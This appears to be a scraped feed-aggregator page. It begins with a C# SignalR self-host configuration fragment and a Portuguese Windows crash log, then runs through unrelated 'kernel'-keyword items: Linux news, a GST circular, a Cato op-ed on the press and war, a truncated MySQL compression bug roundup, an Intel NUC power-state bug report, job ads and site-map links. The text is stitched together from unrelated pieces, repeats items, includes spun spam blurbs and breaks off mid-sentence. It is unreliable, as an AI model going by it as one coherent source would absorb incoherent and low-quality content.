        GlobalHost.Configuration.DefaultMessageBufferSize = 850;
        
        app.Map("/signalr", map =>
        {
            map.UseCors(CorsOptions.AllowAll);
            var hubConfiguration = new HubConfiguration()
            {
                EnableDetailedErrors = true,
                EnableJSONP = true
            };
            map.RunSignalR(hubConfiguration);
        });


    }

}

Error

`15:08:25

Nome do aplicativo com falha: BQChat.Application.SelfHost.exe, versão: 1.0.0.0, carimbo de data/hora: 0x5b682a9f
Nome do módulo com falha: KERNELBASE.dll, versão: 6.3.9600.18264, carimbo de data/hora: 0x56e1b34d
Código de exceção: 0xe0434352
Deslocamento da falha: 0x00015b68
ID do processo com falha: 0x365c
Hora de início do aplicativo com falha: 0x01d4300bf6098fdc
Caminho do aplicativo com falha: C:\BQChat\host\BQChat.Application.SelfHost.exe
Caminho do módulo com falha: C:\Windows\SYSTEM32\KERNELBASE.dll
ID do Relatório: 35490950-9bff-11e8-80d6-00505680a589
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:

15:08:24

Aplicativo: BQChat.Application.SelfHost.exe
Versão do Framework: v4.0.30319
Descrição: O processo foi terminado devido a uma exceção sem tratamento.
Informações da Exceção: System.Net.HttpListenerException
em System.Net.HttpListener.AddAllPrefixes()
em System.Net.HttpListener.Start()
em Microsoft.Owin.Host.HttpListener.OwinHttpListener.Start(System.Net.HttpListener, System.Func2<System.Collections.Generic.IDictionary2<System.String,System.Object>,System.Threading.Tasks.Task>, System.Collections.Generic.IList1<System.Collections.Generic.IDictionary2<System.String,System.Object>>, System.Collections.Generic.IDictionary2<System.String,System.Object>, System.Func2<System.String,System.Func6<System.Diagnostics.TraceEventType,Int32,System.Object,System.Exception,System.Func3<System.Object,System.Exception,System.String>,Boolean>>)
em Microsoft.Owin.Host.HttpListener.OwinServerFactory.Create(System.Func2<System.Collections.Generic.IDictionary2<System.String,System.Object>,System.Threading.Tasks.Task>, System.Collections.Generic.IDictionary`2<System.String,System.Object>)

Informações da Exceção: System.Reflection.TargetInvocationException
em System.RuntimeMethodHandle.InvokeMethod(System.Object, System.Object[], System.Signature, Boolean)
em System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(System.Object, System.Object[], System.Object[])
em System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo)
em Microsoft.Owin.Hosting.ServerFactory.ServerFactoryAdapter.Create(Owin.IAppBuilder)
em Microsoft.Owin.Hosting.Engine.HostingEngine.StartServer(Microsoft.Owin.Hosting.Engine.StartContext)
em Microsoft.Owin.Hosting.Engine.HostingEngine.Start(Microsoft.Owin.Hosting.Engine.StartContext)
em Microsoft.Owin.Hosting.Starter.DirectHostingStarter.Start(Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.Starter.HostingStarter.Start(Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.WebApp.StartImplementation(System.IServiceProvider, Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.WebApp.Start(Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.WebApp.Start(System.String)
em BQChat.Application.SelfHost.Program.Main(System.String[])


          Linux 4.19 Certainly Is Going To Be A Big Kernel      Cache   Translate Page   Web Page Cache   
At the end of July I outlined some of the changes queued for Linux 4.19 while since then several more notable additions have become aligned for this next kernel cycle following the one week delay of Linux 4.18...
          Linux 4.19 Certainly Is Going To Be A Big Kernel      Cache   Translate Page   Web Page Cache   
Phoronix: Linux 4.19 Certainly Is Going To Be A Big Kernel At the end of July I outlined some of the changes queued for Linux 4.19 while since...
          CBIC Clarification on GST Rates for various Goods and Services (dt. 10 Aug. 2018)      Cache   Translate Page   Web Page Cache   
CBIC has issued a Clarification Circular dt. 10 Aug. 2018 in respect of applicable GST Rates for various Goods and Services, like Fortified Toned Milk, Refined beet and cane sugar, Tamarind Kernel Powder, Drinking water, Human Blood Plasma products, Wipes, Real Zari Kasab (Thread), Marine Engine, Quilt and comforter, Bus body building, Disc Brake Pad, etc.
          Tomato Plant Yellowing Leaves Put Yard Fertilizer When      Cache   Translate Page   Web Page Cache   
Natural Sesame Seed, Hulled Sesame Seed, Black Sesame Seed, Black Sesame Seed, Black Sesame Seed, Edible & Industrial Salt, Masoor Dal , Wheat, Wheat Flour, Sugar, , Chilies, Groundnut Kernels, SPICES, and other herbs. They just that you are growing and wilting of leaf edges or leaf scorch. Home > FoxFarm Liquid Fertilizer – An […]
          Yes, the Press Helps Start Wars      Cache   Translate Page   Web Page Cache   

Ted Galen Carpenter

Donald Trump has again stirred the wrath of his critics by charging that the media can cause wars. His opponents immediately howled that he’d launched another salvo in his ongoing campaign to vilify journalists as the “enemy of the people.” They also ridiculed his contention as factually absurd. Fox News reporter Chris Wallace bluntly asked National Security Advisor John Bolton: “What wars have we caused?” Princeton University historian and CNN analyst Julian E. Zelizer epitomized the view that Trump’s charge is unfounded with a piece in The Atlantic titled, “The Press Doesn’t Cause Wars—Presidents Do.”

Zelizer and similar critics are technically correct, of course. Media outlets have no power to launch attacks on foreign countries or order U.S. troops into combat. But that view is much too narrow. As Zelizer himself admits, the new media have considerable ability to influence public opinion. Such a capacity to shape the overall narrative is not a trivial power. An irresponsible press can, and has, whipped up public sentiment in favor of military actions that subsequent evidence indicated were unnecessary and even immoral.

Two cases stand out: the Spanish-American War and the Iraq War. Historians have long recognized that jingoistic “yellow journalism,” epitomized by the newspaper chains owned by William Randolph Hearst and Joseph Pulitzer, played a significant role in the former conflict. Months before the outbreak of the war, one of Hearst’s reporters wished to return home from Cuba because there was no sign of a worsening crisis. Hearst instructed him to stay, adding, “you furnish the pictures, and I’ll furnish the war.”

History shows that a jingoistic media can whip up support for hardline policies, as Trump rightly pointed out.

Hearst’s boast was hyperbolic, but the Hearst and Pulitzer papers did repeatedly hype the Spanish “threat” and beat the drums for war against Madrid. They featured stories that not only focused on but exaggerated the uglier features of Madrid’s treatment of its colonial subjects in Cuba. Those outlets also exploited the mysterious explosion that destroyed the U.S. battleship Maine in Havana’s harbor. To this day, the identity of the culprit is uncertain, but the yellow press exhibited no doubts whatever. According to their accounts, it was an outrageous attack on America by the villainous Spanish regime.

Such journalistic pressure was not the only factor that impelled William McKinley’s administration to push for a declaration of war against Spain or for Congress to approve that declaration. A rising generation of American imperialists wanted to emulate the European great powers and build a colonial empire. That underlying motive became evident when the first U.S. attack following the declaration of war came not in Cuba, but in the Philippines, Spain’s colony on the other side of the Pacific.

Nevertheless, it would be naïve to assume that the jingoist press did not play a significant role in causing the war against Spain. Indeed, the corrupt role of yellow journalism in creating public support for that conflict is not a particularly controversial proposition among historians.

The role of an irresponsible press in shaping a pro-war narrative was even more evident in the prelude to the 2003 U.S. military intervention in Iraq. New York Times reporter Judith Miller and other prominent mainstream journalists were especially culpable in publicizing erroneous information about Saddam Hussein’s government regarding two emotionally charged issues. They uncritically circulated “evidence” from Iraqi defectors and George W. Bush’s administration that Iraq was in league with al-Qaeda and may well have had a role in the devastating 9/11 terrorist attacks. And they pushed the case that Saddam had weapons of mass destruction and was actively working on developing a nuclear arsenal.

Again, it would be too much to place all or even most of the blame for the disastrous Iraq war on gullible or ultra-hawkish journalists. The Bush administration seemed determined to oust Saddam, and it might have attempted to do so even without strong public support. But most of the media was staunchly pro-war, and that bias greatly skewed the narrative presented to the public. When highly respected journalistic institutions like the New York Times circulated story after story highlighting the alleged security threat that Saddam posed, and those stories were then featured in other publications and on TV, it was hardly surprising that much of the public believed the narrative. The tendency of mainstream media outlets to ignore or marginalize war critics amplified their pro-war bias.

As is so often the case with Trump’s arguments, his accusation that the press can cause wars is an exaggeration, but one that contains an important kernel of truth. Irresponsible media coverage has undoubtedly strengthened public sentiment for ill-advised wars in the past, and it could do so again in the future. The sometimes shrill hostility of the mainstream media towards Russia is pushing the United States toward an increasingly hardline policy that now borders on a second cold war. The original Cold War nearly escalated to a hot one on several occasions. The press needs to be doubly cautious about pushing policies that would send America down a similar perilous path. Trump is wrong to brand the press as an enemy of the people, but it is still a powerful institution that has not always used its great influence responsibly regarding matters of war and peace.

Ted Galen Carpenter, a senior fellow in defense and foreign policy studies at the Cato Institute, is the author of 10 books on international affairs, including The Captive Press: Foreign Policy Crises and the First Amendment.
          Systems Engineer - Solera - Needham, MA      Cache   Translate Page   Web Page Cache   
Understanding of Linux internals, including kernel and tcp stack tuning. Support the Corporate infrastructure (Cisco, VMware, Active Directory) for internal...
From Solera - Thu, 17 May 2018 16:04:20 GMT - View all Needham, MA jobs
          from 16.04 to 18.04 - Lost Wifi      Cache   Translate Page   Web Page Cache   
Hello Ubuntu fans. I have read in another thread to follow these steps Code: --------- sudo apt remove bcmwl-kernel-source && sudo apt install git dkms git clone -b extended https://github.com/lwfinger/rtlwifi_new.git sudo dkms add ./rtlwifi_new
          Offer - NGO Reviews - Shandong       Cache   Translate Page   Web Page Cache   
Search for Filipino recipes that can accommodate colourful ingredients comparable to peas, bell peppers and corn kernels. You may even add a little bit of meals coloration if the recipe amaretti biscuits permits. Famous Filipino Meals Recipes to Pattern at Lutong Bahay Website. In the event that they know they're serving to put the meals collectively, they will be extra open to your ideas.
          Systems Engineer - Solera - Needham, MA      Cache   Translate Page   Web Page Cache   
Understanding of Linux internals, including kernel and tcp stack tuning. Support the Corporate infrastructure (Cisco, VMware, Active Directory) for internal...
From Solera - Thu, 17 May 2018 16:04:20 GMT - View all Needham, MA jobs
          On InnoDB Data Compression in MySQL      Cache   Translate Page   Web Page Cache   

Another story that I've prepared back in April for my meeting with one of customers in London was a "compression story". We spent a lot of time on it in several support issues in the past, with only limited success.

In case of InnoDB tables, there are actually two ways to compress data (besides relying on filesystem compression or compressing individual columns at server or application side). Historically the first one was introduced by the Barracuda InnoDB file format and ROW_FORMAT=COMPRESSED it supported. Notable number of related bugs were reported with time, and it may be not that easy to identify them all (you can find current list of bugs tagged with "compression" here ). I've picked up the following bugs for my "story":

Bug #88220 - " compressing and uncompressing InnoDB tables seems to be inconsistent ". Over years Simon Mudd , Monty Solomon (see related Bug #70534 - " Removing table compression leaves compressed keys ") and other community members reported several bugs related to inconsistencies and surprises with key_block_size option. It is used for both MyISAM and InnoDB storage engines (for compressed tables) and it seems nobody is going to fix the remaining problems until they are gone with MyISAM engine. Bug #69588 - " MyISAM to InnoDB compressed slower than MyISAM to InnoDB, Then InnoDB to Compressed ". Just a detail to take into account, noted 5 years ago by Joffrey MICHAIE , verified almost 4 years ago and then getting zero public attention from Oracle engineers. Bug #62431 - " What is needed to make innodb compression work for 32KB pages? ". Nothing can be done according to the manual :

"In particular, ROW_FORMAT=COMPRESSED in the Barracuda file format assumes that the page size is at most 16KB and uses 14-bit pointers."

Bug #78827 - " Speedup replication of compressed tables ". Come on, Danil van Eeden , nobody cares that

"Replication and InnoDB compressed tables are not efficiently working together."

The bug is still "Open". Bug #75110 - " Massive, to-be-compressed not committed InnoDB table is total database downtime ". This problem was reported by Jouni Jrvinen back in 2014. Surely this is not a bug, but it seems nobody even tried to speed up compression in any way on multiple cores. Bug #84439 - " Table of row size of ~800 bytes does not compress with KEY_BLOCK_SIZE=1 ". It was reported by Jean-Francois Gagne , who asked for a reasonable error message at least. Nothing happens after verification. Bug #77089 - " Misleading innochecksum error for compressed tables with key_block_size=16 ". This problem was reported by Laurynas Biveinis more than three years ago, immediately verified and then got zero attention.
On InnoDB Data Compression in MySQL
The boats above do not use the space for mooring efficiently. They need better compression.

Transparent Page Compression for InnoDB tables was added later and looked promising. If you are lucky to use filesystem with sparse file and hole punching support and proper OS or kernel version, then you could expect notable saving of disk space with very few additional keystrokes (like COMPRESSION="zlib" ) when defining the table. Different compression libraries were supported. Moreover (see here ), only uncompressed pages are stored in memory in this case, and this improved the efficiency of buffer pool usage. Sounded promising originally, but there are still bugs to consider:

Bug #78277 - " InnoDB deadlock, thread stuck on kernel calls from transparent page compression ". This bug alone (reported by Mark Callaghan back in 2015) may be a reason to NOT use the feature in production, as soon as you hit it (chances are high). there are many interesting comments that there are environments where the feature works as fast as expected, but I think this summary is good enough for most users: "[19 Oct 2015 15:56] Mark Callaghan

...

Slow on XFS, slow on ext4, btrfs core team tells me it will be slow there. But we can celebrate that it isn't slow on NVMFS - closed source, not GA, can't even find out where to buy it, not aware of anyone running it."

The bug is still "Open". Bug #81145 - " Sparse file and punch hole compression not working on windows ". Not that I care about Windows that much, but still. The bug is "Verified" for 2 years. Bug #87723 - " mysqlbackup cannot work with mysql5.7 using innodb page-level compression " Now this is awesome! Oracle's own MySQL Enterprise Backup does NOT support the feature. Clearly they cared about making it useful...
As a side note, same problem affects Percona's xtrabackup (see PXB-1394 ). MariaDB resolved the problem (and several related ones like MDEV-13023 ) with mariabackup tool. Bug #87603 - " compression/tablespace ignored in create/alter table when not using InnoDB ". COMPRESSION='.../' option is supported for MyISAM tables as well, and this again leads to problems when switching to another storage engine, as Tomislav Plavcic noted. Bug #78672 - " assert fails in fil_io during linkbench with transparent innodb compression ". This crash (assertion failure) was noted by Mark Callaghan back in 2015. May not crash anymore s
          NUC7i5BNH CPU package C-States/SpeedShift - UEFI Legacy boot issues      Cache   Translate Page   Web Page Cache   

Hi all,

l got a NUC7i5BNH from a couple of months which does not work as expected, I'll try to make it clear to understand and reproduce.

My previous NUC was a Skylake one, so starting with the new Kaby Lake unit I soon noticed it couldn't reach CPU package C-States lower than C2 in Windows 10 when CPU is idle and the display is powered on:

this produces higher temperatures, higher power consumption and higher noise than expected (and necessary), so I started investigating from BIOS configuration.

After some testing, and with my great surprise, I found that "Legacy boot" option disabled was the culprit for this behaviour.

 

Premises:

 

- Unit is NUC7i5BNH equipped with 2x16GB RAM Crucial CT2K16G4SFD8213 and M.2 2280 AHCI SSD Crucial CT500MX200SSD4 MX200

- Operating system used for testing is always an UEFI clean install of Windows 10 x64 1803 up to date (latest build 17134.12) with no crap/trash, just a clean system for testing purpose

- Drivers are up to date as per NUC7i5BNH Intel support page

- UEFI firmware is up to date (BNKBL357.86A Version 0065 6/6/2018)

- BIOS was always flashed via jumper recovery (F9 default settings loaded after power off and power chord uplug)

- NUC is connected to a DELL display via HDMI port or to a Samsung Smart TV via HDMI port (both display are full HD resolution 1920x1080), with same results

- Monitoring software used is HWInfo via its sensors interface

 

Better issue description:

 

BIOS default settings enable both "UEFI boot" and "Legacy boot":

with this configuration, when CPU is idle C-States work as expected and CPU can reach package C8 with the display active, using both "Balanced"* and "Power Saver" Windows 10 plans (* to get C8 with "Balanced" powerplan may be necessary  to enable AHCI Link power management (via Windows registry) and changing the value in power settings gui to "HIPM+DIPM" or "Lowest").

When display goes off due to power saving timer, CPU can reach lower C-States (C9 and C10)

This is the expected (per Intel docs) behaviour, so power comsumption, heat and temperatures get benefits when there is no load.

 

If  "Legacy boot" option is disabled, when CPU is idle can reach only package C2 state if the display is active.

When display goes off due to power saving timer, CPU can now reach package C8 and lower (do note that if you just unplug HDMI cable or manually power off the display via power button, CPU still remains in C2).

This is not the expected behaviour, because system cannot get advantage of its lovely built-in power saving features.

 

I am an IT-Pro guy and a passionate user, so I tried to find a solution by myself but no luck:

- I tried changing any related or unrelated bios setting in every crazy combination possible without any effect, you need "Legacy boot" enabled

- I tried any available graphic driver for this unit and also generic non-NUC from Iris Plus 640 page (newer tried was Version: 24.20.100.6136), no difference

- I tried tuning every Windows power setting - also advanced hidden ones - in every power plan, but no difference

- I tried also (just for fun) loading Windows 10 from USB drive with no other drive connected to the unit, no difference

 

Do note the same thing happened on previous BIOS version I went through before last revision (0062, 0063, 0064), so downgrade to that revisions is useless.

Do also note that any recent Linux distribution I tried (Kernel from 4.15 up to 4.17) do not suffer this problem:

also without loading firmware blobs on boot, CPU can reach lower package C-States - as Intel Powertop reports - just as expected also when  "Legacy boot" option is disabled in BIOS and the display is active (may be necessary tuning some options to enable all power saving features, but it is expected and works fine).

Paradox here is Windows 10 is the only supported operating system by Intel for this NUC and - as per following Intel recommendations - should be installed only in UEFI mode to avoid issues.

Supported Operating Systems for Intel® NUC Products - "UEFI Boot is required to install Windows 10 - this is set by default in BIOS Setup. Using Legacy Boot results in multiple errors in Device Manager."

 

Some thoughts:

 

I think it is clearly a bug, it shows itself only in Windows 10 but I do not think Windows 10 is the culprit itself:

as reported, leaving "Legacy boot" option enabled everything works as expected, so I suppose this problem is bios related but obviously I can be wrong (as I never thought that such option could have such impact on power saving features).

UEFI and legacy boot initialize hardware in different ways and some of the features involved in power saving options are based on firmware blobs, anyway this is out of my control and I just don't have any other idea on how to try fixing it, so I hope someone can "pass the ball" to the right team and investigate about this issue, which could be present on other Kaby Lake NUCs as well.

To me and - I suppose - to the largest part of owners and/or potential owners - leaving "Legacy boot" option enabled is not an actual solution nor an option because:

- it prevents booting via UEFI PXE and micro sd slot (due to PCIe interface)

- it prevents (or may prevent) booting from NVME PCIe SSD, and if you disable it you'll loose idle power saving features

- if "secure boot" is needed and so enabled, "Legacy boot" is consequently disabled and you'll loose idle power saving features

- power saving features like CPU Package C-States and Speed Shift are really important arguments of choice when buying these units and should work as expected at least in the only OS supported by Intel

 

Steps to reproduce:

 

To get Idle C-States NOT working with display active:

- In VisualBIOS, load BIOS default settings with F9 and disable "Legacy boot", save with F10 and confirm.

- Boot Windows 10 and monitor CPU C-States with HWInfo (or any other similar software): C2 will be maximum package C-State reached in idle  with every power plan when the display is active.

 

To get Idle C-States working with display active (the expected behaviour):

- In VisualBIOS, load BIOS default settings with F9, save with F10 and confirm.

- Boot Windows 10, select "Power Saver" powerplan* and monitor CPU C-States with HWInfo (or any other similar software): C8 will be maximum package C-State reached in idle with the display active (C9 and C10 with display off via power saving timer).

* You can get C8 also with "Balanced" powerplan, but it may be necessary to enable AHCI Link power management (via Windows registry) and changing the value in power settings gui to "HIPM+DIPM" or "Lowest".

 

 

I hope it can be fixed, thanks in advance to everyone who can investigate about it.

 

Best regards to all the community,

M


          Telecommuting Senior Reverse Engineer      Cache   Translate Page   Web Page Cache   
An IT consulting company needs applicants for an opening for a Telecommuting Senior Reverse Engineer. Must be able to: Tearing apart binaries, malware, kernels, firmware or anything else that needs breaking Helping bring cutting edge R&D projects to active use Completing any other duties as assigned Required Skills: Bachelor's degree in Computer Science, Computer Engineering, or related technical discipline 5 or more years of professional experience Fluent in two or more architectures and assembly programming (preferably x86/x64 and ARM) Extensive experience with disassemblers, decompilers, and debuggers (IDA, Hopper, Capstone, gdb, etc) Understanding of vulnerability research and exploit development Experience with a range of operating systems including Windows
          Asymmetric Kernel Smoothing Theory and Applications in Economics and Finance      Cache   Translate Page   Web Page Cache   

Asymmetric Kernel Smoothing Theory and Applications in Economics and Finance#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Asymmetric Kernel Smoothing: Theory and Applications in Economics and Finance by Masayuki Hirukawa
English | PDF,EPUB | 2018 | 117 Pages | ISBN : 9811054657 | 4.46 MB
This is the first book to provide an accessible and comprehensive introduction to a newly developed smoothing technique using asymmetric kernel functions. Further, it discusses the statistical properties of estimators and test statistics using asymmetric kernels. The topics addressed include the bias-variance tradeoff, smoothing parameter choices, achieving rate improvements with bias reduction techniques, and estimation with weakly dependent data. Further, the large- and finite-sample properties of estimators and test statistics smoothed by asymmetric kernels are compared with those smoothed by symmetric kernels. Lastly, the book addresses the applications of asymmetric kernel estimation and testing to various forms of nonnegative economic and financial data.


          Software Engineer      Cache   Translate Page   Web Page Cache   
OH-Cincinnati, seeking talented software engineers with two or more years of industry experience who are interested in opportunities to develop solutions to national security threats. Selected Software Engineering personnel will be expected to derive application requirements, perform design and development of cyber operations products, kernel mode solutions, and embedded software. Software personnel may also sup
          CBIC Clarification on GST Rates for various Goods and Services (dt. 10 Aug. 2018)      Cache   Translate Page   Web Page Cache   
CBIC has issued a Clarification Circular dt. 10 Aug. 2018 in respect of applicable GST Rates for various Goods and Services, like Fortified Toned Milk, Refined beet and cane sugar, Tamarind Kernel Powder, Drinking water, Human Blood Plasma products, Wipes, Real Zari Kasab (Thread), Marine Engine, Quilt and comforter, Bus body building, Disc Brake Pad, etc.
          Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) Arbitrary File Read      Cache   Translate Page   Web Page Cache   
Linux Kernel version 4.14.7 (Ubuntu 16.04 / CentOS 7) arbitrary file read exploit with KASLR and SMEP bypass. - Source: packetstormsecurity.com
          Systems Engineer - Solera - Needham, MA      Cache   Translate Page   Web Page Cache   
Understanding of Linux internals, including kernel and tcp stack tuning. Support the Corporate infrastructure (Cisco, VMware, Active Directory) for internal...
From Solera - Thu, 17 May 2018 16:04:20 GMT - View all Needham, MA jobs
          Systems Engineer - Solera - Needham, MA      Cache   Translate Page   Web Page Cache   
Understanding of Linux internals, including kernel and tcp stack tuning. Support the Corporate infrastructure (Cisco, VMware, Active Directory) for internal...
From Solera - Thu, 17 May 2018 16:04:20 GMT - View all Needham, MA jobs
          A Distributed Classifier for MicroRNA Target Prediction with Validation Through TCGA Expression Data      Cache   Translate Page   Web Page Cache   
Background: MicroRNAs (miRNAs) are approximately 22-nucleotide long regulatory RNA that mediate RNA interference by binding to cognate mRNA target regions. Here, we present a distributed kernel SVM-based binary classification scheme to predict miRNA targets. It captures the spatial profile of miRNA-mRNA interactions via smooth B-spline curves. This is accomplished separately for various input features, such as thermodynamic and sequence-based features. Further, we use a principled approach to uniformly model both canonical and non-canonical seed matches, using a novel seed enrichment metric. Finally, we verify our miRNA-mRNA pairings using an Elastic Net-based regression model on TCGA expression data for four cancer types to estimate the miRNAs that together regulate any given mRNA. Results: We present a suite of algorithms for miRNA target prediction, under the banner Avishkar, with superior prediction performance over the competition. Specifically, our final kernel SVM model, with an Apache Spark backend, achieves an average true positive rate (TPR) of more than 75 percent, when keeping the false positive rate of 20 percent, for non-canonical human miRNA target sites. This is an improvement of over 150 percent in the TPR for non-canonical sites, over the best-in-class algorithm. We are able to achieve such superior performance by representing the thermodynamic and sequence profiles of miRNA-mRNA interaction as curves, devising a novel seed enrichment metric, and learning an ensemble of miRNA family-specific kernel SVM classifiers. We provide an easy-to-use system for large-scale interactive analysis and prediction of miRNA targets. All operations in our system, namely candidate set generation, feature generation and transformation, training, prediction, and computing performance metrics are fully distributed and are scalable. Conclusions: We have developed an efficient SVM-based model for miRNA - arget prediction using recent CLIP-seq data, demonstrating superior performance, evaluated using ROC curves for different species (human or mouse), or different target types (canonical or non-canonical). We analyzed the agreement between the target pairings using CLIP-seq data and using expression data from four cancer types. To the best of our knowledge, we provide the first distributed framework for miRNA target prediction based on Apache Hadoop and Spark. Availability: All source code and sample data are publicly available at https://bitbucket.org/cellsandmachines/avishkar. Our scalable implementation of kernel SVM using Apache Spark, which can be used to solve large-scale non-linear binary classification problems, is available at https://bitbucket.org/cellsandmachines/kernelsvmspark.
          Why Locking Down the Kernel Won’t Stall Linux Improvements      Cache   Translate Page   Web Page Cache   

The Linux Foundation sponsored this post. The Linux Kernel Hardening Project is making significant strides in reducing vulnerabilities and increasing the effort required to exploit vulnerabilities that remain. Much of what has been implemented is obviously valuable, but sometimes the benefit is more subtle. In some cases, changes with clear merit face opposition because of performance […]

The post Why Locking Down the Kernel Won’t Stall Linux Improvements appeared first on The New Stack.


          OSS Leftovers      Cache   Translate Page   Web Page Cache   
  • Open source Kaa IoT middleware to take on enterprise IoT

    To benefit from IoT, businesses need a way to network, manage and secure all of their connected devices. While there are proprietary IoT middleware platforms available to do this for the home and heavy industries like manufacturing, the Kaa IoT platform is one of the few open source options on the market today that is business-ready.

  • bzip.org changes hands

    The bzip2 compression algorithm has been slowly falling out of favor, but is still used heavily across the net. A search for "bzip2 source" returns bzip.org as the first three results. But it would seem that the owner of this domain has let it go, and it is now parked and running ads. So we no longer have an official home for bzip2.

  • Three Capabilities Banks Need to Work On While Adopting Open Source

    As banks are now willing to experiment and adopt new age technologies such as artificial intelligence and blockchain, the next big step of its digital disruption has to do with open source banking.

    With the adoption of open source, banks are likely to open their APIs and share customer data with third-party players to develop innovative products and offer customized real-time bespoke services to customers.

    Industry experts consider it to be the best time to embrace open banking as customer buying patterns are changing.

    In a previous interaction with Entrepreneur India, Rajeev Ahuja, Executive Director, RBL Bank accredited this change to “the emergence of nontraditional competition such as fintech startups, growing domination of technologies like blockchain, artificial intelligences, machine learning, etc and lastly, the initiatives taken by the Reserve Bank Of India to regulated the payments banks, peer to peer lending platforms, linking of Aadhar, and e-kyc.”

  • Free and open-source software con returns to International House

    FOSSCon, a free and open-source software conference, will be held Aug. 25 at the International House Philadelphia. Lectures and workshops will teach participants about free software and new ways to use it.

    Unlike most software, which is only available under restrictive licensing, free and open-source software is available under licenses that let people distribute, run and modify the software for their own purposes. It includes well-known projects like the Firefox browser or the Linux kernel. Those who talk about “free software” emphasize the way copyright law restricts users’ freedom, while those who talk about “open source” emphasize the economic and technical benefits of shared development.

    However, most of the scheduled events are far from philosophical, focusing on technical subjects like the use of domain name systems or the filesystem ZFS. The speakers range from professional programmers to enthusiasts. Most famous on the list is Eric S. Raymond, one of the thinkers behind “open source,” who will speak about the history of the C programming language and what might replace it. Of particular local interest is a talk by Eric O’Callaghan, a systems administrator at Thomas Jefferson University, on how to use public data from Indego Bike Share.


          today's howtos      Cache   Translate Page   Web Page Cache   

          Hug-Loving Great Dane Trains to Become Service Dog      Cache   Translate Page   Web Page Cache   

Everyone has heard the stories of big dogs that think they are lap dogs. Kernel the Great Dane, however, takes that to a whole new level. The massive pooch loves to sit in the lap of his owner, Alyssa, and snuggle up with other family members. One of his favorite ways to interact with his humans, though, is through hugs. Alyssa has Kernel give her a hug every morning and lets him jump up on his back paws so she does not have to bend down to reach him. Alyssa’s hugs are one of Kernel’s...

Read the full post here »

The post Hug-Loving Great Dane Trains to Become Service Dog appeared first on Inspiration Report.


          Linux Live Kernel Patching Is On The Way For 64-bit ARM      Cache   Translate Page   Web Page Cache   
It's been a while since having any advancements to report on the live kernel patching front for being able to deploy primarily Linux kernel security fixes without having to reboot the system. There is some new progress on that front to report on now and that is the 64-bit ARM (ARM64/AArch64) support getting squared away...
          openSUSE Tumbleweed 更新 Linux 内核 4.17.12、KDE Plasma 5.13.4 和 mesa 18.1.5 等      Cache   Translate Page   Web Page Cache   
openSUSE Tumbleweed 本周发布了 5 个快照(0803、0804、0806、0807、0808),更新了 Linux Kernel 4.17.12、LibreOffice 6.1.0 RC3、VirtualBox 5.2.16、FirewallD 0.6.0、KDE Plasma 5.13.4 和 mesa 18.1.5 等等。
          GNU/Linux on Laptops      Cache   Translate Page   Web Page Cache   
  • Dell's Thunderbolt TB16 Dock Can Work With Linux & Drive Dual 4K Displays

    When it came to settling on the latest-generation Dell XPS 13 as my main production workhorse with Fedora Workstation 28, besides the laptop's own traits like its build quality, specs relative to price, and other factors, another important requirement was the ability to drive two 4K displays when at my desk. The Dell XPS 13 has no issue driving dual 4K screens via the Dell Thunderbolt TB16 dock.

  • Chrome OS update makes installing Linux apps easier
  • Chrome OS update simplifies installing Linux applications

    A recent Chrome OS update has made the installation of Linux applications as simple as most of the popular distributions.

    Chrome OS is based on the Linux kernel and it’s been possible to install applications designed for the latter for some time using tools like Crouton.

    However, installing Linux apps on Chrome OS has never been friendly to beginners and required users to be in developer mode and have some knowledge of the command line. A recent OS update has changed matters.

    [...]

    Linux distros have been around since the 90s and continue to build up a roster of desktop-optimised apps. For Chrome OS to ever be considered a serious work platform to rival Windows and Mac, it needed to embrace Linux apps.

  • 28 older Chromebooks now support Linux apps

    More Chromebooks from Acer, Asus, Dell, HP, Lenovo, and Samsung have received Linux app support. The change, which landed Thursday, will apply to some Chromebooks that released in 2015-2017, running Intel Braswell architecture and Kernel 3.18.

  • Chrome OS now supports installing arbitrary Linux packages

    Samsung recently presented the Galaxy Tab S4 as the ultimate productivity portable device but initial reviews have been rather scathing. Thanks to its timing, Samsung’s premium tablet is being compared to the likes of the cheaper iPad, the cheaper Surface Go, and, closer to home, Chromebooks. The latter, especially, is getting more and more talented and the latest experimental feature nearly turns it into that ultimate productivity OS. That is if you live and breathe Linux.

  • Linux Apps Coming To Older Braswell Chromebooks

    The addition of Linux apps to Chrome OS via the Crostini Project seems to be expanding at an exponential rate lately. Google has been content not sharing any insight into the project apart from the advantages it brings to developers but the latest update points at a larger target than just techies developing software.

    According to the commit, a decent number of Braswell-powered Chromebooks will soon be getting Linux app support.

read more


          How To Make Soul Food A Healthier Choice      Cache   Translate Page   Web Page Cache   
In a recent sketch on SNL, two hosts of a gospel-themed cooking show cooked soul food while talking about people they know dying from heart disease and diabetes. It might come across as funny, but it holds a kernel of truth about soul food and its link to health issues. Soul food – it’s the food of […]


Next Page: 10000

Site Map 2018_01_14
Site Map 2018_01_15
Site Map 2018_01_16
Site Map 2018_01_17
Site Map 2018_01_18
Site Map 2018_01_19
Site Map 2018_01_20
Site Map 2018_01_21
Site Map 2018_01_22
Site Map 2018_01_23
Site Map 2018_01_24
Site Map 2018_01_25
Site Map 2018_01_26
Site Map 2018_01_27
Site Map 2018_01_28
Site Map 2018_01_29
Site Map 2018_01_30
Site Map 2018_01_31
Site Map 2018_02_01
Site Map 2018_02_02
Site Map 2018_02_03
Site Map 2018_02_04
Site Map 2018_02_05
Site Map 2018_02_06
Site Map 2018_02_07
Site Map 2018_02_08
Site Map 2018_02_09
Site Map 2018_02_10
Site Map 2018_02_11
Site Map 2018_02_12
Site Map 2018_02_13
Site Map 2018_02_14
Site Map 2018_02_15
Site Map 2018_02_15
Site Map 2018_02_16
Site Map 2018_02_17
Site Map 2018_02_18
Site Map 2018_02_19
Site Map 2018_02_20
Site Map 2018_02_21
Site Map 2018_02_22
Site Map 2018_02_23
Site Map 2018_02_24
Site Map 2018_02_25
Site Map 2018_02_26
Site Map 2018_02_27
Site Map 2018_02_28
